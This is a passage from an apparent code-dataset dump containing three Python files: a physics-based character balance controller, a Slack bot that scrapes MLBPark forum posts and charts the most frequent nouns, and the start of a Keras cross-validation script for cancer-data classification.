contact_des_ids.append(motion[0].skeleton.getJointIndex('LeftFoot_foot_0_1_0'))\n if foot_viewer.check_h_l.value():\n contact_des_ids.append(motion[0].skeleton.getJointIndex('LeftFoot_foot_1_0'))\n\n if foot_viewer.check_om_r.value():\n contact_des_ids.append(motion[0].skeleton.getJointIndex('RightFoot_foot_0_0'))\n if foot_viewer.check_op_r.value():\n contact_des_ids.append(motion[0].skeleton.getJointIndex('RightFoot_foot_0_0_0'))\n if foot_viewer.check_im_r is not None and foot_viewer.check_im_r.value():\n contact_des_ids.append(motion[0].skeleton.getJointIndex('RightFoot_foot_0_1'))\n if foot_viewer.check_ip_r.value():\n contact_des_ids.append(motion[0].skeleton.getJointIndex('RightFoot_foot_0_1_0'))\n if foot_viewer.check_h_r.value():\n contact_des_ids.append(motion[0].skeleton.getJointIndex('RightFoot_foot_1_0'))\n\n contact_ids = list() # temp idx for balancing\n contact_ids.extend(contact_des_ids)\n\n contact_joint_ori = list(map(controlModel.getJointOrientationGlobal, contact_ids))\n contact_joint_pos = list(map(controlModel.getJointPositionGlobal, contact_ids))\n contact_body_ori = list(map(controlModel.getBodyOrientationGlobal, contact_ids))\n contact_body_pos = list(map(controlModel.getBodyPositionGlobal, contact_ids))\n contact_body_vel = list(map(controlModel.getBodyVelocityGlobal, contact_ids))\n contact_body_angvel = list(map(controlModel.getBodyAngVelocityGlobal, contact_ids))\n\n ref_joint_ori = list(map(motion[frame].getJointOrientationGlobal, contact_ids))\n ref_joint_pos = list(map(motion[frame].getJointPositionGlobal, contact_ids))\n ref_joint_vel = [motion.getJointVelocityGlobal(joint_idx, frame) for joint_idx in contact_ids]\n ref_joint_angvel = [motion.getJointAngVelocityGlobal(joint_idx, frame) for joint_idx in contact_ids]\n ref_body_ori = list(map(motionModel.getBodyOrientationGlobal, contact_ids))\n ref_body_pos = list(map(motionModel.getBodyPositionGlobal, contact_ids))\n # ref_body_vel = list(map(controlModel.getBodyVelocityGlobal, contact_ids))\n ref_body_angvel = [motion.getJointAngVelocityGlobal(joint_idx, frame) for joint_idx in contact_ids]\n ref_body_vel = [ref_joint_vel[i] + np.cross(ref_joint_angvel[i], ref_body_pos[i] - ref_joint_pos[i])\n for i in range(len(ref_joint_vel))]\n\n is_contact = [1] * len(contact_ids)\n contact_right = len(set(contact_des_ids).intersection(rIDlist)) > 0\n contact_left = len(set(contact_des_ids).intersection(lIDlist)) > 0\n\n contMotionOffset = th[0][0] - th_r[0][0]\n\n linkPositions = controlModel.getBodyPositionsGlobal()\n linkVelocities = controlModel.getBodyVelocitiesGlobal()\n linkAngVelocities = controlModel.getBodyAngVelocitiesGlobal()\n linkInertias = controlModel.getBodyInertiasGlobal()\n\n CM = yrp.getCM(linkPositions, linkMasses, totalMass)\n dCM = yrp.getCM(linkVelocities, linkMasses, totalMass)\n CM_plane = copy.copy(CM)\n CM_plane[1] = 0.\n dCM_plane = copy.copy(dCM)\n dCM_plane[1] = 0.\n\n P = ymt.getPureInertiaMatrix(TO, linkMasses, linkPositions, CM, linkInertias)\n dP = ymt.getPureInertiaMatrixDerivative(dTO, linkMasses, linkVelocities, dCM, linkAngVelocities, linkInertias)\n\n # calculate jacobian\n Jsys, dJsys = controlModel.computeCom_J_dJdq()\n J_contacts = [] # type: list[np.ndarray]\n dJ_contacts = [] # type: list[np.ndarray]\n for contact_id in contact_ids:\n J_contacts.append(Jsys[6*contact_id:6*contact_id + 6, :])\n dJ_contacts.append(dJsys[6*contact_id:6*contact_id + 6])\n\n # calculate footCenter\n footCenter = sum(contact_body_pos) / len(contact_body_pos) if len(contact_body_pos) > 0 \\\n else 
.5 * (controlModel.getBodyPositionGlobal(supL) + controlModel.getBodyPositionGlobal(supR))\n footCenter[1] = 0.\n # if len(contact_body_pos) > 2:\n # hull = ConvexHull(contact_body_pos)\n\n footCenter_ref = sum(ref_body_pos) / len(ref_body_pos) if len(ref_body_pos) > 0 \\\n else .5 * (motionModel.getBodyPositionGlobal(supL) + motionModel.getBodyPositionGlobal(supR))\n footCenter_ref = footCenter_ref + contMotionOffset\n # if len(ref_body_pos) > 2:\n # hull = ConvexHull(ref_body_pos)\n footCenter_ref[1] = 0.\n\n # footCenter[0] = footCenter[0] + getParamVal('com X offset')\n # footCenter[1] = footCenter[0] + getParamVal('com Y offset')\n # footCenter[2] = footCenter[2] + getParamVal('com Z offset')\n\n # initialization\n if g_initFlag == 0:\n preFootCenter[0] = footCenter.copy()\n g_initFlag = 1\n\n # if contactChangeCount == 0 and np.linalg.norm(footCenter - preFootCenter[0]) > 0.01:\n # contactChangeCount += 30\n if contactChangeCount > 0:\n # change footcenter gradually\n footCenter = preFootCenter[0] + (maxContactChangeCount - contactChangeCount)*(footCenter-preFootCenter[0])/maxContactChangeCount\n else:\n preFootCenter[0] = footCenter.copy()\n\n # linear momentum\n # TODO:\n # We should consider dCM_ref, shouldn't we?\n # add getBodyPositionGlobal and getBodyPositionsGlobal in csVpModel!\n # to do that, set joint velocities to vpModel\n CM_ref_plane = footCenter\n # CM_ref_plane = footCenter_ref\n CM_ref = footCenter + np.array([getParamVal('com X offset'), motionModel.getCOM()[1] + getParamVal('com Y offset'), getParamVal('com Z offset')])\n dL_des_plane = Kl * totalMass * (CM_ref - CM) - Dl * totalMass * dCM\n # dL_des_plane = Kl * totalMass * (CM_ref_plane - CM_plane) - Dl * totalMass * dCM_plane\n # dL_des_plane[1] = 0.\n # print('dCM_plane : ', np.linalg.norm(dCM_plane))\n\n # angular momentum\n CP_ref = footCenter\n # CP_ref = footCenter_ref\n bodyIDs, contactPositions, contactPositionLocals, contactForces = vpWorld.calcPenaltyForce(bodyIDsToCheck, mus, Ks, Ds)\n CP = yrp.getCP(contactPositions, contactForces)\n if CP_old[0] is None or CP is None:\n dCP = None\n else:\n dCP = (CP - CP_old[0])/(1/30.)\n CP_old[0] = CP\n\n if CP is not None and dCP is not None:\n ddCP_des = Kh*(CP_ref - CP) - Dh * dCP\n dCP_des = dCP + ddCP_des * (1/30.)\n CP_des = CP + dCP_des * (1/30.)\n # CP_des = footCenter\n CP_des = CP + dCP*(1/30.) 
+ .5*ddCP_des*((1/30.)**2)\n dH_des = np.cross((CP_des - CM), (dL_des_plane + totalMass * mm.s2v(wcfg.gravity)))\n if contactChangeCount > 0: # and contactChangeType == 'DtoS':\n dH_des *= (maxContactChangeCount - contactChangeCount)/maxContactChangeCount\n else:\n dH_des = None\n\n # convex hull\n contact_pos_2d = np.asarray([np.array([contactPosition[0], contactPosition[2]]) for contactPosition in contactPositions])\n p = np.array([CM_plane[0], CM_plane[2]])\n # hull = None # type: Delaunay\n # if contact_pos_2d.shape[0] > 0:\n # hull = Delaunay(contact_pos_2d)\n # print(hull.find_simplex(p) >= 0)\n\n # set up equality constraint\n # TODO:\n # logSO3 is just q'', not acceleration.\n # To make a_oris acceleration, q'' -> a will be needed\n # body_ddqs = list(map(mm.logSO3, [mm.getSO3FromVectors(np.dot(body_ori, mm.unitY()), mm.unitY()) for body_ori in contact_body_ori]))\n # body_ddqs = list(map(mm.logSO3, [np.dot(contact_body_ori[i].T, np.dot(ref_body_ori[i], mm.getSO3FromVectors(np.dot(ref_body_ori[i], mm.unitY()), mm.unitY()))) for i in range(len(contact_body_ori))]))\n body_ddqs = list(map(mm.logSO3, [np.dot(contact_body_ori[i].T, np.dot(ref_body_ori[i], mm.getSO3FromVectors(np.dot(ref_body_ori[i], up_vec_in_each_link[contact_ids[i]]), mm.unitY()))) for i in range(len(contact_body_ori))]))\n body_qs = list(map(mm.logSO3, contact_body_ori))\n body_angs = [np.dot(contact_body_ori[i], contact_body_angvel[i]) for i in range(len(contact_body_ori))]\n body_dqs = [mm.vel2qd(body_angs[i], body_qs[i]) for i in range(len(body_angs))]\n a_oris = [np.dot(contact_body_ori[i], mm.qdd2accel(body_ddqs[i], body_dqs[i], body_qs[i])) for i in range(len(contact_body_ori))]\n a_oris = list(map(mm.logSO3, [np.dot(np.dot(ref_body_ori[i], mm.getSO3FromVectors(np.dot(ref_body_ori[i], up_vec_in_each_link[contact_ids[i]]), mm.unitY())), contact_body_ori[i].T) for i in range(len(contact_body_ori))]))\n\n # body_ddq = body_ddqs[0]\n # body_ori = contact_body_ori[0]\n # body_ang = np.dot(body_ori.T, contact_body_angvel[0])\n #\n # body_q = mm.logSO3(body_ori)\n # body_dq = mm.vel2qd(body_ang, body_q)\n # a_ori = np.dot(body_ori, mm.qdd2accel(body_ddq, body_dq, body_q))\n\n KT_SUP = np.diag([kt_sup/5., kt_sup, kt_sup/5.])\n\n # a_oris = list(map(mm.logSO3, [mm.getSO3FromVectors(np.dot(body_ori, mm.unitY()), mm.unitY()) for body_ori in contact_body_ori]))\n # a_sups = [np.append(kt_sup*(ref_body_pos[i] - contact_body_pos[i] + contMotionOffset) + dt_sup*(ref_body_vel[i] - contact_body_vel[i]),\n # kt_sup*a_oris[i]+dt_sup*(ref_body_angvel[i]-contact_body_angvel[i])) for i in range(len(a_oris))]\n # a_sups = [np.append(kt_sup*(ref_body_pos[i] - contact_body_pos[i] + contMotionOffset) - dt_sup * contact_body_vel[i],\n # kt_sup*a_oris[i] - dt_sup * contact_body_angvel[i]) for i in range(len(a_oris))]\n a_sups = [np.append(np.dot(KT_SUP, (ref_body_pos[i] - contact_body_pos[i] + contMotionOffset)) - dt_sup * contact_body_vel[i],\n kt_sup*a_oris[i] - dt_sup * contact_body_angvel[i]) for i in range(len(a_oris))]\n\n # momentum matrix\n RS = np.dot(P, Jsys)\n R, S = np.vsplit(RS, 2)\n\n # rs = np.dot((np.dot(dP, Jsys) + np.dot(P, dJsys)), dth_flat)\n rs = np.dot(dP, np.dot(Jsys, dth_flat)) + np.dot(P, dJsys)\n r_bias, s_bias = np.hsplit(rs, 2)\n\n #######################################################\n # optimization\n #######################################################\n # if contact == 2 and footCenterR[1] > doubleTosingleOffset/2:\n if contact_left and not contact_right:\n config['weightMap']['RightUpLeg'] = .8\n 
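# the right leg is the swing leg during left-only support, so track it tightly\n            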
config['weightMap']['RightLeg'] = .8\n config['weightMap']['RightFoot'] = .8\n else:\n config['weightMap']['RightUpLeg'] = .1\n config['weightMap']['RightLeg'] = .25\n config['weightMap']['RightFoot'] = .2\n\n # if contact == 1 and footCenterL[1] > doubleTosingleOffset/2:\n if contact_right and not contact_left:\n config['weightMap']['LeftUpLeg'] = .8\n config['weightMap']['LeftLeg'] = .8\n config['weightMap']['LeftFoot'] = .8\n else:\n config['weightMap']['LeftUpLeg'] = .1\n config['weightMap']['LeftLeg'] = .25\n config['weightMap']['LeftFoot'] = .2\n\n w = mot.getTrackingWeight(DOFs, motion[0].skeleton, config['weightMap'])\n\n mot.addTrackingTerms(problem, totalDOF, Bt, w, ddth_des_flat)\n if dH_des is not None:\n mot.addLinearTerms(problem, totalDOF, Bl, dL_des_plane, R, r_bias)\n mot.addAngularTerms(problem, totalDOF, Bh, dH_des, S, s_bias)\n\n if True:\n for c_idx in range(len(contact_ids)):\n mot.addConstraint2(problem, totalDOF, J_contacts[c_idx], dJ_contacts[c_idx], dth_flat, a_sups[c_idx])\n\n if contactChangeCount > 0:\n contactChangeCount = contactChangeCount - 1\n if contactChangeCount == 0:\n maxContactChangeCount = 30\n contactChangeType = 0\n\n r = problem.solve()\n problem.clear()\n ddth_sol_flat = np.asarray(r['x'])\n # ddth_sol_flat[foot_seg_dofs] = np.array(ddth_des_flat)[foot_seg_dofs]\n ype.nested(ddth_sol_flat, ddth_sol)\n\n rootPos[0] = controlModel.getBodyPositionGlobal(selectedBody)\n localPos = [[0, 0, 0]]\n\n for i in range(stepsPerFrame):\n # apply penalty force\n bodyIDs, contactPositions, contactPositionLocals, contactForces = vpWorld.calcPenaltyForce(bodyIDsToCheck, mus, Ks, Ds)\n # bodyIDs, contactPositions, contactPositionLocals, contactForces, contactVelocities = vpWorld.calcManyPenaltyForce(0, bodyIDsToCheck, mus, Ks, Ds)\n vpWorld.applyPenaltyForce(bodyIDs, contactPositionLocals, contactForces)\n\n controlModel.setDOFAccelerations(ddth_sol)\n # controlModel.setDOFAccelerations(ddth_des)\n # controlModel.set_ddq(ddth_sol_flat)\n # controlModel.set_ddq(ddth_des_flat)\n controlModel.solveHybridDynamics()\n\n if forceShowTime > viewer.objectInfoWnd.labelForceDur.value():\n forceShowTime = 0\n viewer_ResetForceState()\n\n forceforce = np.array([viewer.objectInfoWnd.labelForceX.value(), viewer.objectInfoWnd.labelForceY.value(), viewer.objectInfoWnd.labelForceZ.value()])\n extraForce[0] = getParamVal('Fm') * mm.normalize2(forceforce)\n if viewer_GetForceState():\n forceShowTime += wcfg.timeStep\n vpWorld.applyPenaltyForce(selectedBodyId, localPos, extraForce)\n\n vpWorld.step()\n\n controlModel_ik.set_q(controlModel.get_q())\n\n\n # rendering\n bodyIDs, geomIDs, positionLocalsForGeom = vpWorld.getContactInfoForcePlate(bodyIDsToCheck)\n for foot_seg_id in footIdlist:\n control_model_renderer.body_colors[foot_seg_id] = (255, 240, 255)\n control_model_renderer.geom_colors[foot_seg_id] = [(255, 240, 255)] * controlModel.getBodyGeomNum(foot_seg_id)\n\n for i in range(len(geomIDs)):\n control_model_renderer.geom_colors[bodyIDs[i]][geomIDs[i]] = (255, 0, 0)\n # for foot_seg_id in footIdlist:\n # control_model_renderer.body_colors[foot_seg_id] = (255, 240, 255)\n #\n # for contact_id in contact_ids:\n # control_model_renderer.body_colors[contact_id] = (255, 0, 0)\n\n\n rd_footCenter[0] = footCenter\n rd_footCenter_ref[0] = footCenter_ref\n\n rd_CM[0] = CM\n\n rd_CM_plane[0] = CM.copy()\n rd_CM_plane[0][1] = 0.\n\n if CP is not None and dCP is not None:\n rd_CP[0] = CP\n rd_CP_des[0] = CP_des\n\n rd_dL_des_plane[0] = [dL_des_plane[0]/100, dL_des_plane[1]/100, 
dL_des_plane[2]/100]\n rd_dH_des[0] = dH_des\n\n rd_grf_des[0] = dL_des_plane - totalMass * mm.s2v(wcfg.gravity)\n\n del rd_foot_ori[:]\n del rd_foot_pos[:]\n # for seg_foot_id in footIdlist:\n # rd_foot_ori.append(controlModel.getJointOrientationGlobal(seg_foot_id))\n # rd_foot_pos.append(controlModel.getJointPositionGlobal(seg_foot_id))\n rd_foot_ori.append(controlModel.getJointOrientationGlobal(supL))\n rd_foot_ori.append(controlModel.getJointOrientationGlobal(supR))\n rd_foot_pos.append(controlModel.getJointPositionGlobal(supL))\n rd_foot_pos.append(controlModel.getJointPositionGlobal(supR))\n\n rd_root_des[0] = rootPos[0]\n rd_root_ori[0] = controlModel.getBodyOrientationGlobal(0)\n rd_root_pos[0] = controlModel.getBodyPositionGlobal(0)\n\n del rd_CF[:]\n del rd_CF_pos[:]\n for i in range(len(contactPositions)):\n rd_CF.append(contactForces[i]/400)\n rd_CF_pos.append(contactPositions[i].copy())\n\n if viewer_GetForceState():\n rd_exfen_des[0] = [extraForce[0][0]/100, extraForce[0][1]/100, extraForce[0][2]/100]\n rd_exf_des[0] = [0, 0, 0]\n else:\n rd_exf_des[0] = [extraForce[0][0]/100, extraForce[0][1]/100, extraForce[0][2]/100]\n rd_exfen_des[0] = [0, 0, 0]\n\n extraForcePos[0] = controlModel.getBodyPositionGlobal(selectedBody)\n\n # render contact_ids\n\n # render skeleton\n if SKELETON_ON:\n Ts = dict()\n Ts['pelvis'] = controlModel.getJointTransform(idDic['Hips'])\n Ts['thigh_R'] = controlModel.getJointTransform(idDic['RightUpLeg'])\n Ts['shin_R'] = controlModel.getJointTransform(idDic['RightLeg'])\n Ts['foot_R'] = controlModel.getJointTransform(idDic['RightFoot'])\n Ts['foot_heel_R'] = controlModel.getJointTransform(idDic['RightFoot'])\n Ts['heel_R'] = np.eye(4)\n Ts['outside_metatarsal_R'] = controlModel.getJointTransform(idDic['RightFoot_foot_0_0'])\n Ts['outside_phalanges_R'] = controlModel.getJointTransform(idDic['RightFoot_foot_0_0_0'])\n # Ts['inside_metatarsal_R'] = controlModel.getJointTransform(idDic['RightFoot_foot_0_1'])\n Ts['inside_metatarsal_R'] = np.eye(4)\n Ts['inside_phalanges_R'] = controlModel.getJointTransform(idDic['RightFoot_foot_0_1_0'])\n Ts['spine_ribs'] = controlModel.getJointTransform(idDic['Spine'])\n Ts['head'] = controlModel.getJointTransform(idDic['Spine1'])\n Ts['upper_limb_R'] = controlModel.getJointTransform(idDic['RightArm'])\n Ts['lower_limb_R'] = controlModel.getJointTransform(idDic['RightForeArm'])\n Ts['thigh_L'] = controlModel.getJointTransform(idDic['LeftUpLeg'])\n Ts['shin_L'] = controlModel.getJointTransform(idDic['LeftLeg'])\n Ts['foot_L'] = controlModel.getJointTransform(idDic['LeftFoot'])\n Ts['foot_heel_L'] = controlModel.getJointTransform(idDic['LeftFoot'])\n Ts['heel_L'] = np.eye(4)\n Ts['outside_metatarsal_L'] = controlModel.getJointTransform(idDic['LeftFoot_foot_0_0'])\n Ts['outside_phalanges_L'] = controlModel.getJointTransform(idDic['LeftFoot_foot_0_0_0'])\n # Ts['inside_metatarsal_L'] = controlModel.getJointTransform(idDic['LeftFoot_foot_0_1'])\n Ts['inside_metatarsal_L'] = np.eye(4)\n Ts['inside_phalanges_L'] = controlModel.getJointTransform(idDic['LeftFoot_foot_0_1_0'])\n Ts['upper_limb_L'] = controlModel.getJointTransform(idDic['LeftArm'])\n Ts['lower_limb_L'] = controlModel.getJointTransform(idDic['LeftForeArm'])\n\n skeleton_renderer.appendFrameState(Ts)\n\n def postFrameCallback_Always(frame):\n if foot_viewer is not None:\n foot_viewer.foot_pressure_gl_window.refresh_foot_contact_info(frame, vpWorld, bodyIDsToCheck, mus, Ks, Ds)\n foot_viewer.foot_pressure_gl_window.goToFrame(frame)\n\n 
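# register the callbacks and start the UI loop; foot_viewer is created just\n    # below, after viewer.show(), and postFrameCallback_Always tolerates None\n    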
viewer.setPostFrameCallback_Always(postFrameCallback_Always)\n    viewer.setSimulateCallback(simulateCallback)\n    viewer.startTimer(1/30.)\n    # viewer.play()\n    viewer.show()\n\n    foot_viewer = FootWindow(viewer.x() + viewer.w() + 20, viewer.y(), 300, 500, 'foot contact modifier', controlModel)\n    foot_viewer.show()\n    foot_viewer.check_op_l.value(True)\n    foot_viewer.check_ip_l.value(True)\n    foot_viewer.check_op_r.value(True)\n    foot_viewer.check_ip_r.value(True)\n    viewer.motionViewWnd.goToFrame(0)\n\n    Fl.run()\n\n\nmain()\n","sub_path":"MomentumProject/foot_example_segfoot_constraint/main_MomentumProject_working_ik_tiptoe_real_joint.py","file_name":"main_MomentumProject_working_ik_tiptoe_real_joint.py","file_ext":"py","file_size_in_byte":42658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"}
+{"seq_id":"385650749","text":"# Slack bot\nfrom slackclient import SlackClient\nimport urllib.request\nfrom bs4 import BeautifulSoup\nfrom konlpy.tag import Twitter\nimport time\nfrom konlpy.corpus import kolaw\nfrom konlpy.utils import pprint\nfrom collections import Counter\nimport os\nimport random\nfrom multiprocessing import Pool,Manager\nfrom matplotlib import pyplot as plt\nfrom matplotlib import font_manager, rc\nfont_name = font_manager.FontProperties(fname=\"c:/Windows/Fonts/malgun.ttf\").get_name()\nrc('font', family=font_name)\n\ndef mlbparkCrawl(pageNumber):\n    doct=[]\n    # print(str(pageNumber)+' entering page')\n    with urllib.request.urlopen(\"http://mlbpark.donga.com/mp/b.php?p=\"+str(pageNumber)+\"&m=list&b=bullpen&query=&select=&user=\") as url:\n        content = url.read()\n        soup = BeautifulSoup(content, 'html.parser')\n        bullpen = soup.find_all('a')\n        resp = []\n        idx = 0\n        for s in bullpen:\n            try:\n                prop = s.get('class')\n                if prop != None and prop[0] == \"bullpenbox\":  # posts in the bullpen list carry this class\n                    # print(\"%s : %s\" % (s.get('href'), s.get_text()))\n                    resp.append(s.get('href'))\n                    idx += 1\n                    # the title text is appended five times, apparently to weight titles above body text\n                    doct.append(s.find('span',{'class':'bullpen'}).get_text())\n                    doct.append(s.find('span',{'class':'bullpen'}).get_text())\n                    doct.append(s.find('span',{'class':'bullpen'}).get_text())\n                    doct.append(s.find('span',{'class':'bullpen'}).get_text())\n                    doct.append(s.find('span',{'class':'bullpen'}).get_text())\n            except UnicodeEncodeError:\n                print(\"Error : %d\" % (idx))\n        ar_count=0\n        for link in resp:\n            try:\n                with urllib.request.urlopen(link) as url:\n                    content = url.read()\n                    soup = BeautifulSoup(content, 'html.parser')\n                    ar_txt = soup.find('div',{'class':'ar_txt'})\n                    ar_count += 1\n                    if ar_txt.get_text() != None:\n                        doct.append(ar_txt.get_text())\n            except Exception:\n                print('error: failed to save page '+str(pageNumber))\n        print(str(pageNumber)+\" done\")\n        return doct\n\ndef get_tags(text, ntags=50):\n    spliter = Twitter()\n    # konlpy Twitter morpheme analyzer\n    nouns = spliter.nouns(text)\n    # extract only the nouns from the text\n    count = Counter(nouns)\n    # count how often each noun occurs\n    return_list = []  # holds the noun/frequency pairs\n    for n, c in count.most_common(ntags):\n        if len(n)>1:\n            temp = {'tag': n, 'count': c}\n            return_list.append(temp)\n    # most_common(ntags) returns the ntags most frequent nouns in descending\n    # order of frequency; each noun and its count is stored in return_list\n    return return_list\n\ndef main(ch):\n    print('main in')\n    text_file_name = \"mlbpark.txt\"\n    noun_count = 15\n    cc = [1,2,3,4,5,6,7,8,9,10,11,12]\n    pool=Pool(processes=4)\n    print('pool in')\n    doc=pool.map(mlbparkCrawl,cc)\n    pool.close()\n    print('end pool')\n    output_file_name = \"mlbparkcount.txt\"\n    slack.api_call(\n        \"chat.postMessage\",\n        channel=ch,\n        text='다 됐어요. 
검색결과 입니다',\n        as_user='true'\n    )\n    try:\n        open_output_file = open(text_file_name, 'w',-1,\"utf-8\")\n        docstr = ''.join(str(doc))\n        docs=docstr.replace(' ','')\n        open_output_file.write(docs)\n        open_output_file.close()\n        open_text_file = open(text_file_name, 'r',-1,\"utf-8\")\n        # open the file to analyze\n        text = open_text_file.read()  # read the file\n        tags = get_tags(text, noun_count)  # run get_tags\n        open_text_file.close()  # close the file\n        open_output_file = open(output_file_name, 'w',-1,\"utf-8\")\n        # open count.txt, which will hold the results\n        msg = []\n        x=[]\n        y=[]\n        for tag in tags:\n            noun = tag['tag']\n            count = tag['count']\n            x.append(noun)\n            y.append(count)\n            msg.append(noun+' '+str(count))\n            open_output_file.write('{} {}\\n'.format(noun, count))\n        open_output_file.close()\n        print(msg)\n        plt.bar(x,y,label='test')\n        # plt.show\n        plt.savefig('test.png')\n        with open('test.png', 'rb') as f:\n            slack.api_call(\n                \"files.upload\",\n                channels=ch,\n                filename='test.png',\n                title='검색결과',\n                file=f,\n                as_user='true'\n            )\n        return msg\n    except Exception:\n        print('error: failed to write results')\n        return 'error'\n\ndef slacksend(ch):\n    msg = main(ch)\n    # textmsg = ''\n    # for i in msg:\n    #     textmsg+=str(i)+'\\n'\n    # # print(msg)\n    # slack.api_call(\n    #     \"chat.postMessage\",\n    #     channel=ch,\n    #     text=textmsg,\n    #     as_user='true'\n    # )\n    return\n\ndef sendmsg(ch,msg):\n    if msg == '엠팍':\n        rand=['MLBPARK 이슈를 알려드릴게요','현재 엠팍의 이슈는요 잠시만요','맨날 이거만시키네']\n        slack.api_call(\n            \"chat.postMessage\",\n            channel=ch,\n            text=random.choice(rand),\n            as_user='true'\n        )\n    elif msg == '유리나':\n        rand=['저 부르셨어요?','저요?','저 왜요?','저를 언급하셨네요']\n        slack.api_call(\n            \"chat.postMessage\",\n            channel=ch,\n            text=random.choice(rand),\n            as_user='true'\n        )\n    elif msg == '사망':\n        slack.api_call(\n            \"chat.postMessage\",\n            channel=ch,\n            text='유리나님이 사망하셨습니다. 곧 다시 태어납니다',\n            as_user='true'\n        )\n    elif msg == '입장':\n        rand = ['유리나가 왔어요~','Im back!','저 살아왔어요 ㅠㅠ','유리나 입장!']\n        slack.api_call(\n            \"chat.postMessage\",\n            channel=ch,\n            text=random.choice(rand),\n            as_user='true'\n        )\n    elif msg == 'ㅋㅋ':\n        rand = ['ㅋㅋ','ㅎㅎ','ㅋㅋㅋㅋㅋ','히히','ㅎㅎㅎㅎ']\n        slack.api_call(\n            \"chat.postMessage\",\n            channel=ch,\n            text=random.choice(rand),\n            as_user='true'\n        )\n    elif msg == '명령어':\n        rand = (\"유리나의 명령어: '엠팍','ㅋ','ㅎ','유리나','명령어'\")\n        slack.api_call(\n            \"chat.postMessage\",\n            channel=ch,\n            text=rand,\n            as_user='true'\n        )\n\nif __name__ == '__main__':\n    token = os.environ['slacktoken']  # custom environment variable holding the bot token\n    slack = SlackClient(token)\n    bot_name = \"yurinabot\"\n    bot_id=''\n    api_call = slack.api_call(\"users.list\")\n    if api_call.get('ok'):\n        # retrieve all users so we can find our bot\n        users = api_call.get('members')\n        for user in users:\n            if 'name' in user and user.get('name') == bot_name:\n                bot_id=user.get('id')\n\n    while True:\n        try:\n            if slack.rtm_connect(with_team_state=False):\n                sendmsg('general','입장')\n                while True:\n                    msg=slack.rtm_read()\n                    if len(msg) > 0:\n                        for i in msg:\n                            iText=str(i.get('text'))\n                            if i.get('user') !='U8S35RTPT' and i.get('user') != 'U8TUV60JE':\n                                if iText == '엠팍':\n                                    sendmsg(i.get('channel'),'엠팍')\n                                    slacksend(i.get('channel'))\n                                elif '유리나' in iText and i.get('user'):\n                                    if '명령어' in iText:\n                                        sendmsg(i.get('channel'),'명령어')\n                                    else:\n                                        sendmsg(i.get('channel'),'유리나')\n                                elif ('ㅋ' in iText or 'ㅎ' in iText) and i.get('user') != bot_id:\n                                    sendmsg(i.get('channel'),'ㅋㅋ')\n                    del msg[:]\n                    # del doc[:]\n                    time.sleep(2)\n            else:\n                print(\"Connection Failed\")\n        except Exception:\n            sendmsg('general','사망') 
","sub_path":"yurina.py","file_name":"yurina.py","file_ext":"py","file_size_in_byte":8441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"563274993","text":"import os\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras import regularizers\nfrom sklearn.model_selection import StratifiedKFold\n# from sklearn.metrics import roc_curve\n# from sklearn.metrics import auc\n# from sklearn.ensemble import RandomForestClassifier\n#import matplotlib.pyplot as plt\nimport numpy\n\n\ndef main():\n \"\"\"Creates 3 layer neural network and trains/evaluates on cancer data.\"\"\"\n\n numpy.random.seed(7)\n\n # get complete data set\n filename = os.path.join(os.getcwd(), 'Data\\\\detect a\\\\Only Numbers (normal).csv')\n total_data = numpy.loadtxt(filename, delimiter=\",\")\n\n # randomly split data into train, validation, test\n #trainData, validationData, testData = getData(filename, 0.1, 0.2, False)\n\n # filename = os.path.join(os.getcwd(), '..', 'Data/detect a/Training Data.csv' )\n # trainData = numpy.loadtxt(filename, delimiter=\",\")\n # filename = os.path.join(os.getcwd(), '..', 'Data/detect a/Test Data.csv')\n # testData = numpy.loadtxt(filename, delimiter=\",\")\n\n # data, result, type, gender is in column 41\n total = [total_data[:, 0:40], total_data[:, 41], total_data[:, 42]]\n\n # define 10-fold cross validation\n kfold = StratifiedKFold(n_splits=10, shuffle=True, random_state=7)\n\n # create file to write in\n filename = os.path.join(os.getcwd(),'Data\\\\detect a\\\\CrossValidation\\\\results.csv')\n file = open(filename, 'w')\n\n regularizer = [0, 0.0005, 150, 0.96] # first two are regularization\n #coefficients, epochs, threshold\n\n average = 0\n false_positive = 0\n for train, test in kfold.split(total[0], total[1]):\n model = Sequential()\n model.add(Dense(30, input_dim=40,\n kernel_regularizer=regularizers.l2(regularizer[0]),\n activation='relu'))\n model.add(Dense(25, kernel_regularizer=regularizers.l2(regularizer[1]),\n activation='relu'))\n model.add(Dense(1, activation='sigmoid'))\n\n model.compile(loss='binary_crossentropy',\n optimizer='adam', metrics=['accuracy'])\n # class_weight makes false negatives less desirable\n model.fit(total[0][train], total[1][train], class_weight={0: 1, 1: 1},\n epochs=regularizer[2], batch_size=32, verbose=0)\n\n accuracy = model.evaluate(total[0][train], total[1][train], verbose=0)\n print(\"train: \" + str(accuracy[1]*100))\n accuracy = model.evaluate(total[0][test], total[1][test], verbose=0)\n print(\"total: \" + str(accuracy[1]*100))\n\n # calculate prediction\n predictions = model.predict(total[0][test])\n\n # roc\n\n # y_pred_keras = predictions.ravel()\n # fpr, tpr, thresholds = roc_curve(total[1][test], y_pred_keras)\n # aucKeras = auc(fpr, tpr)\n # print(aucKeras)\n # plt.figure(1)\n # plt.plot([0, 1], [0, 1], 'k--')\n # plt.plot(fpr, tpr, label='Keras (area = {:.3f})'.format(aucKeras))\n # plt.xlabel('False positive rate')\n # plt.ylabel('True positive rate')\n # plt.title('ROC curve')\n # plt.legend(loc='best')\n # plt.show()\n # # Zoom in view of the upper left corner.\n # plt.figure(2)\n # plt.xlim(0, 0.01)\n # plt.ylim(0.70, 0.85)\n # plt.plot([0, 1], [0, 1], 'k--')\n # plt.plot(fpr, tpr, label='Keras (area = {:.3f})'.format(auc))\n # plt.xlabel('False positive rate')\n # plt.ylabel('True positive rate')\n # plt.title('ROC curve (zoomed in at top left)')\n # plt.legend(loc='best')\n # plt.show()\n\n predictions = predictions.tolist()\n # round 
